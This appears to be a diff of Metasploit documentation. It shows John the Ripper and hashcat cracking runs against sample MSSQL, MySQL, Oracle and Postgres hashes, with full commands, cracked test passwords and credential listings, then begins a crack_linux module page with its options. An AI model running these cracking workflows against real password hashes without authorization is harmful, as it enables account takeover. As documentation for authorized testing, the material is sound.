+[*]    Cracking Command: /usr/sbin/john --session=glBBUtZH --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle12c --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:48) 16.66g/s 2133p/s 2133c/s 2133C/s test3:::..password0
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking oracle12c hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=glBBUtZH --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle12c --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking oracle12c hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=glBBUtZH --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle12c --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking oracle12c hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=glBBUtZH --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle12c --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking oracle12c hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=glBBUtZH --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle12c --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type   Username            Cracked Password  Method
+ -----  ---------   --------            ----------------  ------
+ 1356   mssql05     mssql05_toto        toto              Single
+ 1357   mssql       mssql_foo           FOO               Single
+ 1358   mssql12     mssql12_Password1!  Password1!        Single
+ 1359   mysql       mysql_probe         probe             Single
+ 1360   mysql-sha1  mysql-sha1_tere     tere              Single
+ 1361   oracle      simon               A                 Single
+ 1362   oracle      SYSTEM              THALES            Single
+ 1363   oracle11    DEMO                epsilon           Single
+ 1364   oracle11    oracle11_epsilon    epsilon           Single
+ 1365   oracle12c   oracle12c_epsilon   epsilon           Single
+
+[*] Checking dynamic_1034 hashes already cracked...
+[*] Cracking dynamic_1034 hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=Ici8lKLE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1034 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Warning: no OpenMP support for this hash type, consider --fork=8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:48) 50.00g/s 168000p/s 168000c/s 168000C/s test3:::..:::3tset4
+Use the "--show --format=dynamic_1034" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking dynamic_1034 hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=Ici8lKLE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1034 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1034 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=Ici8lKLE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1034 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1034 hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=Ici8lKLE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1034 --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1034 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=Ici8lKLE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1034 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type     Username            Cracked Password  Method
+ -----  ---------     --------            ----------------  ------
+ 1356   mssql05       mssql05_toto        toto              Single
+ 1357   mssql         mssql_foo           FOO               Single
+ 1358   mssql12       mssql12_Password1!  Password1!        Single
+ 1359   mysql         mysql_probe         probe             Single
+ 1360   mysql-sha1    mysql-sha1_tere     tere              Single
+ 1361   oracle        simon               A                 Single
+ 1362   oracle        SYSTEM              THALES            Single
+ 1363   oracle11      DEMO                epsilon           Single
+ 1364   oracle11      oracle11_epsilon    epsilon           Single
+ 1365   oracle12c     oracle12c_epsilon   epsilon           Single
+ 1366   dynamic_1034  example             password          Single
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public              private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
+----  ------  -------  ------              -------                                                                                                                                                                                                                                                               -----  ------------        ----------
+                       mssql_foo           foo                                                                                                                                                                                                                                                                          Password            
+                       oracle12c_epsilon   epsilon                                                                                                                                                                                                                                                                      Password            
+                       DEMO                epsilon                                                                                                                                                                                                                                                                      Password            
+                       oracle11_epsilon    S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       example             md5be86a79bf2043622d58d5453c47d4860                                                                                                                                                                                                                                          Postgres md5        raw-md5,postgres
+                       simon               A                                                                                                                                                                                                                                                                            Password            
+                       SYSTEM              THALES                                                                                                                                                                                                                                                                       Password            
+                       mssql12_Password1!  0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16                                                                                                                               Nonreplayable hash  mssql12
+                       mysql-sha1_tere     tere                                                                                                                                                                                                                                                                         Password            
+                       mysql_probe         445ff82636a7ba59                                                                                                                                                                                                                                                             Nonreplayable hash  mysql
+                       mssql_foo           0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254                                                                                                                                                                               Nonreplayable hash  mssql
+                       example             password                                                                                                                                                                                                                                                                     Password            
+                       mssql12_Password1!  Password1!                                                                                                                                                                                                                                                                   Password            
+                       simon               4F8BC1809CB2AF77                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       mssql05_toto        toto                                                                                                                                                                                                                                                                         Password            
+                       oracle11_epsilon    epsilon                                                                                                                                                                                                                                                                      Password            
+                       mssql_foo           FOO                                                                                                                                                                                                                                                                          Password            
+                       SYSTEM              9EEDFA0AD26C6D52                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       mssql05_toto        0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908                                                                                                                                                                                                                       Nonreplayable hash  mssql05
+                       DEMO                S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       oracle12c_epsilon   H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B                                                                        Nonreplayable hash  pbkdf2,oracle12c
+                       mysql_probe         probe                                                                                                                                                                                                                                                                        Password            
+                       mysql-sha1_tere     *5AD8F88516BD021DD43F171E2C785C69F8E54ADB                                                                                                                                                                                                                                    Nonreplayable hash  mysql-sha1
+```
+
+### Hashcat
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_databases
+resource (hashes_hashcat.rb)> set action hashcat
+action => hashcat
+resource (hashes_hashcat.rb)> run
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20190531-29687-sp1ejs
+[*] Wordlist file written out to /tmp/jtrtmp20190531-29687-1u8mjuq
+[*] Checking mssql hashes already cracked...
+[*] Cracking mssql hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=dZTr4DsK --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=131 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/wordlist
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mssql hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=dZTr4DsK --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=131 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mssql hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=dZTr4DsK --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=131 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/jtrtmp20190531-29687-1u8mjuq
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username   Cracked Password  Method
+ -----  ---------  --------   ----------------  ------
+ 1380   mssql      mssql_foo  FOO               Wordlist
+
+[*] Checking mssql05 hashes already cracked...
+[*] Cracking mssql05 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=gKYO7rts --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=132 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/wordlist
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mssql05 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=gKYO7rts --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=132 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mssql05 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=gKYO7rts --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=132 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/jtrtmp20190531-29687-1u8mjuq
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username      Cracked Password  Method
+ -----  ---------  --------      ----------------  ------
+ 1379   mssql05    mssql05_toto  toto              Wordlist
+ 1380   mssql      mssql_foo     FOO               Wordlist
+
+[*] Checking mssql12 hashes already cracked...
+[*] Cracking mssql12 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=X5k9f6JY --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1731 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/wordlist
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mssql12 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=X5k9f6JY --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1731 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mssql12 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=X5k9f6JY --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1731 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/jtrtmp20190531-29687-1u8mjuq
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username      Cracked Password  Method
+ -----  ---------  --------      ----------------  ------
+ 1379   mssql05    mssql05_toto  toto              Wordlist
+ 1380   mssql      mssql_foo     FOO               Wordlist
+
+[*] Checking mysql hashes already cracked...
+[*] Cracking mysql hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=L2YwjG1w --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=200 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/wordlist
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mysql hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=L2YwjG1w --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=200 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mysql hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=L2YwjG1w --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=200 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/jtrtmp20190531-29687-1u8mjuq
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username      Cracked Password  Method
+ -----  ---------  --------      ----------------  ------
+ 1379   mssql05    mssql05_toto  toto              Wordlist
+ 1380   mssql      mssql_foo     FOO               Wordlist
+ 1382   mysql      mysql_probe   probe             Wordlist
+
+[*] Checking mysql-sha1 hashes already cracked...
+[*] Cracking mysql-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=jMcLuSDn --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=300 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/wordlist
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mysql-sha1 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=jMcLuSDn --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=300 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mysql-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=jMcLuSDn --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=300 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/jtrtmp20190531-29687-1u8mjuq
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type   Username         Cracked Password  Method
+ -----  ---------   --------         ----------------  ------
+ 1379   mssql05     mssql05_toto     toto              Wordlist
+ 1380   mssql       mssql_foo        FOO               Wordlist
+ 1382   mysql       mysql_probe      probe             Wordlist
+ 1383   mysql-sha1  mysql-sha1_tere  tere              Wordlist
+
+[*] Checking raw-sha1,oracle hashes already cracked...
+[*] Cracking raw-sha1,oracle hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=zd9AkOJu --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=112 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/wordlist
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking raw-sha1,oracle hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=zd9AkOJu --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=112 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking raw-sha1,oracle hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=zd9AkOJu --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=112 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/jtrtmp20190531-29687-1u8mjuq
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type        Username          Cracked Password  Method
+ -----  ---------        --------          ----------------  ------
+ 1379   mssql05          mssql05_toto      toto              Wordlist
+ 1380   mssql            mssql_foo         FOO               Wordlist
+ 1382   mysql            mysql_probe       probe             Wordlist
+ 1383   mysql-sha1       mysql-sha1_tere   tere              Wordlist
+ 1386   raw-sha1,oracle  DEMO              epsilon           Wordlist
+ 1387   raw-sha1,oracle  oracle11_epsilon  epsilon           Wordlist
+
+[*] Checking oracle11 hashes already cracked...
+[*] Cracking oracle11 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=t5k5I14z --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=112 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/wordlist
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking oracle11 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=t5k5I14z --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=112 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking oracle11 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=t5k5I14z --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=112 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/jtrtmp20190531-29687-1u8mjuq
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type        Username          Cracked Password  Method
+ -----  ---------        --------          ----------------  ------
+ 1379   mssql05          mssql05_toto      toto              Wordlist
+ 1380   mssql            mssql_foo         FOO               Wordlist
+ 1382   mysql            mysql_probe       probe             Wordlist
+ 1383   mysql-sha1       mysql-sha1_tere   tere              Wordlist
+ 1386   raw-sha1,oracle  DEMO              epsilon           Wordlist
+ 1387   raw-sha1,oracle  oracle11_epsilon  epsilon           Wordlist
+
+[*] Checking oracle12c hashes already cracked...
+[*] Cracking oracle12c hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=7dadE1Lr --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12300 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/wordlist
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking oracle12c hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=7dadE1Lr --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12300 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking oracle12c hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=7dadE1Lr --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12300 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/jtrtmp20190531-29687-1u8mjuq
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type        Username           Cracked Password  Method
+ -----  ---------        --------           ----------------  ------
+ 1379   mssql05          mssql05_toto       toto              Wordlist
+ 1380   mssql            mssql_foo          FOO               Wordlist
+ 1382   mysql            mysql_probe        probe             Wordlist
+ 1383   mysql-sha1       mysql-sha1_tere    tere              Wordlist
+ 1386   raw-sha1,oracle  DEMO               epsilon           Wordlist
+ 1387   raw-sha1,oracle  oracle11_epsilon   epsilon           Wordlist
+ 1388   oracle12c        oracle12c_epsilon  epsilon           Wordlist
+
+[*] Checking dynamic_1034 hashes already cracked...
+[*] Cracking dynamic_1034 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=xtcCnmBc --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/wordlist
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking dynamic_1034 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=xtcCnmBc --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking dynamic_1034 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=xtcCnmBc --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/jtrtmp20190531-29687-1u8mjuq
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type        Username           Cracked Password  Method
+ -----  ---------        --------           ----------------  ------
+ 1379   mssql05          mssql05_toto       toto              Wordlist
+ 1380   mssql            mssql_foo          FOO               Wordlist
+ 1382   mysql            mysql_probe        probe             Wordlist
+ 1383   mysql-sha1       mysql-sha1_tere    tere              Wordlist
+ 1386   raw-sha1,oracle  DEMO               epsilon           Wordlist
+ 1387   raw-sha1,oracle  oracle11_epsilon   epsilon           Wordlist
+ 1388   oracle12c        oracle12c_epsilon  epsilon           Wordlist
+ 1389   dynamic_1034     example            password          Wordlist
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public              private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
+----  ------  -------  ------              -------                                                                                                                                                                                                                                                               -----  ------------        ----------
+                       mssql05_toto        0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908                                                                                                                                                                                                                       Nonreplayable hash  mssql05
+                       mssql_foo           0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254                                                                                                                                                                               Nonreplayable hash  mssql
+                       mssql12_Password1!  0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16                                                                                                                               Nonreplayable hash  mssql12
+                       mysql_probe         445ff82636a7ba59                                                                                                                                                                                                                                                             Nonreplayable hash  mysql
+                       mysql-sha1_tere     *5AD8F88516BD021DD43F171E2C785C69F8E54ADB                                                                                                                                                                                                                                    Nonreplayable hash  mysql-sha1
+                       simon               4F8BC1809CB2AF77                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       SYSTEM              9EEDFA0AD26C6D52                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       DEMO                S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       oracle11_epsilon    S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       oracle12c_epsilon   H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B                                                                        Nonreplayable hash  pbkdf2,oracle12c
+                       example             md5be86a79bf2043622d58d5453c47d4860                                                                                                                                                                                                                                          Postgres md5        raw-md5,postgres
+                       mssql_foo           FOO                                                                                                                                                                                                                                                                          Password            
+                       mssql05_toto        toto                                                                                                                                                                                                                                                                         Password            
+                       mysql_probe         probe                                                                                                                                                                                                                                                                        Password            
+                       mysql-sha1_tere     tere                                                                                                                                                                                                                                                                         Password            
+                       oracle11_epsilon    epsilon                                                                                                                                                                                                                                                                      Password            
+                       DEMO                epsilon                                                                                                                                                                                                                                                                      Password            
+                       oracle12c_epsilon   epsilon                                                                                                                                                                                                                                                                      Password            
+                       example             password                                                                                                                                                                                                                                                                     Password
+```

documentation/modules/auxiliary/analyze/crack_linux.md

@@ -0,0 +1,664 @@
+## Vulnerable Application
+
+  This module attempts to use a password cracker to decode Linux
+  based password hashes, such as:
+
+  * `DES` based passwords
+  * `MD5` based passwords
+  * `BSDi` based passwords
+  * `bf`, `bcrypt`, or `blowfish` based passwords
+  * `SHA256` based passwords
+  * `SHA512` based passwords
+
+| Common   | John        | Hashcat |
+|----------|-------------|-------- |
+| des      | descript    | 1500    |
+| md5      | md5crypt    | 500     |
+| bsdi     | bsdicrypt   | 12400   |
+| blowfish | bcrypt      | 3200    |
+| sha256   | sha256crypt | 7400    |
+| sha512   | sha512crypt | 1800    |
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with an `des`, `md5`, `bsdi`, `blowfish`, `sha512`, or `sha256` password hash in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/crack_linux```
+  4. Do: set cracker of choice
+  5. Do: ```run```
+  6. You should hopefully crack a password.
+
+## Actions
+
+   **john**
+
+   Use john the ripper (default).
+
+   **hashcat**
+
+   Use hashcat.
+
+## Options
+
+   **BLOWFISH**
+
+   Crack Blowfish hashes. Default is `false`.
+
+   **BSDi**
+
+   Crack BSDi hashes. Default is `true`.
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+
+   **CRACKER_PATH**
+
+   The absolute path to the cracker executable.  Default behavior is to search `path`.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DES**
+
+   Crack DES hashes. Default is `true`.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **Fork**
+
+   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+
+   **INCREMENTAL**
+
+   Run the cracker in incremental mode.  Default is `true`
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MD5**
+
+   Crack MD5 hashes. Default is `true`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **SHA256**
+
+   Crack SHA256 hashes. Default is `false`.
+
